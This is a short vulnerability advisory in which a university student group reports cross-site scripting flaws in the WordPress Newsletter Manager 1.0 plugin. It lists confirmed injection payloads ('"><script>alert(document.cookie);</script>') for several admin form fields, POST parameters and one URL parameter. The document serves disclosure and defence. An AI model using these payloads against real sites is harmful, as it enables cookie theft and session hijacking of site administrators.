WordPress Newsletter Manager plugin version 1.0 suffers from a cross site scripting vulnerability.
9855db18c9a78538cc3203998f35830239811992a9331a4d779811dcf84dde3e
Hi
We have used our tool, THAPS, to identify vulnerabilities in this WordPress plugin.
We have confirmed at least one of the reported vulnerabilities and created a working exploit located below.
Attached is one or more log files containing the output of our tool, identifying the location of the vulnerabilities which might help the developers locate the issue.
Module: Newsletter Manager
Version: 1.0
Confirmed exploits:
Exploit:
http://wp.bacon/wp-admin/admin.php?page=newsletter-manager-createcampaign
POST data: xyz_em_campName="><script>alert(document.cookie);</script>
Exploit:
http://wp.bacon/wp-admin/admin.php?page=newsletter-manager-emailcampaigns&action=edit_campaign&id=1&pageno=1
POST data: xyz_em_campName="><script>alert(document.cookie);</script>
Exploit:
Newsletter Manager -> Email addresses -> Edit Email:
Email address content: "><script>alert(document.cookie);</script>
Exploit:
Newsletter Manager -> Import/Export -> Batch size: "><script>alert(document.cookie);</script>
Exploit:
Newsletter Manager -> Options
Pagination Limit content: "><script>alert(document.cookie);</script>
Exploit:
http://wp.bacon/wp-admin/admin.php?page=newsletter-manager-emailcampaigns&action=test_mail&id=1&pageno=1&id="><script>alert(document.cookie);</script>
Best Regards
Heine Pedersen and Torben Jensen
Student project group: sw101f12
Aalborg University
Denmark